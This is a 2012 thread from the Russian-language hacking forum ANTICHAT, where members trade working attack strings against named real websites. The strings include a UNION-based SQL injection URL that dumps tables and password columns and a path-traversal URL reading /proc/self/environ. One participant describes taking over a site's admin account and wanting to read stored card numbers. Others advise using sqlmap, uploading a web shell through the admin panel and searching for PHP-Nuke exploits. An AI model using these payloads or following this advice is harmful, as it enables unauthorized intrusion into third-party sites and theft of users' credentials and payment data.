ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

31.03.2012, 02:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 2160
Репутация:
0
|
|
Сообщение от kise
kise said:
Если я не ошибаюсь, то там blind.
Ошибаешься.
Код:
Code:
http://www.33hochu.ru/view_foto.php?id=33382426'+union+select+table_name,user()+from+information_schema.tables+limit+135,1+--+
И смотришь исходный страницы код между "id_p=" и "¶m".
Там очень много таблиц, среди которых заинтересует
Код:
Code:
user = (id,login,login_email,site,nick,password,password_token,status,email,path,name,sex,data_b,url,icq,im,data_reg,data_last,camera,optica,limit_id,foto_in_profile,foto_my,priv_mes,email_reg,rating,avatara,ip,ip_reg,activiti,login_translit
id_style,email_pre,email_code_activ,napominalka,kolvomp3,inbox_new,last_notify,counter,cfg_invisible,cfg_autoplaymp3,cfg_hidestatus,cfg_hidevisits,cfg_rndmp3)
|
|
|
|

31.03.2012, 04:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 1543
Репутация:
0
|
|
Скажите пожалуйста, вот я новичек в этом деле. Вообщем нашол уязвимый сайт, (сюда написать не могу) Вбиваю его в Хавидж, он видит всё, DBs, Tables, Columns, но в одном из пкнктов в Data вместо цифр идут кракозябры, как можно посмотреть эти цифры? Или можно как нибуть выкачать базу?
|
|
|
|

31.03.2012, 13:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 124363
Репутация:
11
|
|
воспользуйся лучше sqlmap'ом тогда
|
|
|
|

31.03.2012, 13:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 142623
Репутация:
19
|
|
Сообщение от ASPIRIN90
ASPIRIN90 said:
Скажите пожалуйста, вот я новичек в этом деле. Вообщем нашол уязвимый сайт, (сюда написать не могу) Вбиваю его в Хавидж, он видит всё, DBs, Tables, Columns, но в одном из пкнктов в Data вместо цифр идут кракозябры, как можно посмотреть эти цифры? Или можно как нибуть выкачать базу?
Скрин прикрепи к сообщению, я хавидж практически не юзаю но ка кто попался мне криво крякнутый и там похожая проблема была..
|
|
|
|

31.03.2012, 16:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 1543
Репутация:
0
|
|
Сообщение от Faaax
Faaax said:
воспользуйся лучше sqlmap'ом тогда
Скачал но не знаю как запустить, Exeшника нет, он видимо на питоне, а я с ним еще никогда не работал((( кстати мне удалось зайти на сайт от имени админа, изменил логин и пароль админа. Так что сайт ПОКА под моим кантролем. Но вот как выкачать базу или посмотреть этот параметр я хз. Не знаю можно ли тут это обсуждать но мне надо посмотреть параметр Base-order-cardnum))) именно эти параметры отображаються кракозябрами)))
|
|
|
|

31.03.2012, 16:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 142623
Репутация:
19
|
|
Сообщение от None
именно эти параметры отображаються кракозябрами)))
Вполне вероятно что шифрованы...
|
|
|
|

31.03.2012, 16:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 124363
Репутация:
11
|
|
залей шелл через админку и подключись к базе
|
|
|
|

31.03.2012, 17:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 1543
Репутация:
0
|
|
Я не знаю ничего про заливку шелла, новичек я еще, может подскажите как это организовть? Скажу точно что сайт стоит на CMS php-nuke, версия ХЗ
хотя и это я определил лиш по структуре ссылок
https://www.site.com/admin.php?op=config
https://www.site.com/admin.php?op=users
https://www.site.com/safe.php?op=pos_order
|
|
|
|

31.03.2012, 23:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 17281
Репутация:
-4
|
|
Можно ли как-то залить шелл?
http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ
|
|
|
|

01.04.2012, 00:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 10816
Репутация:
74
|
|
Сообщение от kise
kise said:
Можно ли как-то залить шелл?
http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ
Правильнее будет вот так:
Код:
Code:
http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ%00
Увы, но скорее всего Вам не удастся залить шелл.
Сообщение от ASPIRIN90
ASPIRIN90 said:
Я не знаю ничего про заливку шелла, новичек я еще, может подскажите как это организовть? Скажу точно что сайт стоит на CMS php-nuke, версия ХЗ
хотя и это я определил лиш по структуре ссылок
https://www.site.com/admin.php?op=config
https://www.site.com/admin.php?op=users
https://www.site.com/safe.php?op=pos_order
Попробуйте определить версию форума, далее ищите эксплоиты. Особенно уязвима версия 7.8, удачного поиска.
UPD: Если Вы нашли sql inj, то попробуйте узнать логин и пароль администратора, желательно руками.
Пару ссылок:
23.3.2. SQL injection with PHP-Nuke
SQL inj PHP-Nuke: Module EasyContent
[URL="http://securityreason.com/securityalert/440"]SQL Inj PHPNuke x
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|